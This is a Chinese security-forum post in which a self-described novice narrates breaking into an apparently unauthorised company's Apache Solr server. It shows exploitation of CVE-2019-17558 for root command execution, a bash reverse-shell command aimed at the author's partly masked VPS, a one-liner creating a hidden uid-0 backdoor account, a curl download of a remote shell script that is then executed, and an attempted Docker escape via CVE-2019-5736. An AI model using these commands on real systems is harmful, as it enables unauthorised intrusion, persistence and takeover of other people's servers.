用户
搜索
  • TA的每日心情
    开心
    2020-12-28 17:29
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋-呆萌菜鸟

    Rank: 1

    1

    主题

    2

    帖子

    32

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2020-8-6
    发表于 2020-12-28 17:59:32 12257
    本帖最后由 yier 于 2020-12-28 18:24 编辑

    0x01 前言

    日常日站,在测试某企业的时候扫描器突然发生反应,发现个solr,一个偶然让本不写文章的菜鸡开始写人生中第一篇文章

    0x02 前戏

    看了看solr的版本

    0.png
    正好之前研究过一段时间的solr的一些rce,挨个试试
    1.jpg
    在一顿操作后,啪的一下很快哈,找到一个CVE-2019-17558可以利用

    0x03 命令执行

    尝试使用CVE-2019-17558脚本执行命令
    2.jpg
    运气爆棚直接就是root权限,我自己都不明白为啥是root
    兴奋之极赶紧反弹shell呀

    bash -i >& /dev/tcp/xx.xx.169.148/1234 0>&1

    3.jpg
    报错500,当时我就懵逼了
    看了看自己的vps,发现啥反应都没有,估计是poc不支持,换了好几个都没用,咋办呀
    很快哈,看一下ssh开了没,开了的话直接创个用户直接连上去不就行了
    4.jpg
    开了,开搞,一句话创建用户设置密码并给root权限

    useradd -p 0`openssl passwd -1 -salt 'abc' cqrdpass` -u 0  -o -g root -G root -s /bin/bash -d /usr/bin/cqrd cqrd

    看一下/etc/passwd
    5.jpg
    但是....
    连接的时候我直接去世
    6.jpg
    去查了一下发现是设置过ssh配置文件,这可咋整
    7.jpg
    我决定在试试反弹shell

    0x04 再次尝试

    这次换一种方法,直接在vps上的web下载到本地

    curl xx.xx.169.148/123.sh -o 123.sh

    爆了500
    8.jpg
    看一下目录
    9.jpg
    ohhhh,上传上去了
    然后就是
    给权限
    执行
    bash ./123.sh
    10.jpg
    当我执行第二个命令的时候我又去世了
    11.jpg
    居然是docker,试试CVE-2019-5736
    12.jpg
    发现可以,但是...然后呢?
    13.gif
    仔细一看发现需要别人启动才会触发
    14.gif
    这一等就是一天,发现什么鬼都没弹,还时不时的被别的ip访问而断开
    于是我决定,不搞了收工
    15.jpg

    结语

    感觉这一次实战学习到了很多,期间还试过jsp码子上到webapp上面连接,但是发现不行,还是有很多的问题没有解决,我还是需要多多学习,告辞!

    发表于 昨天 15:16
    docker逃逸未成功,有后续吗?
    让我们一起干大事!
    有兴趣的表哥加村长QQ:780876774!
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册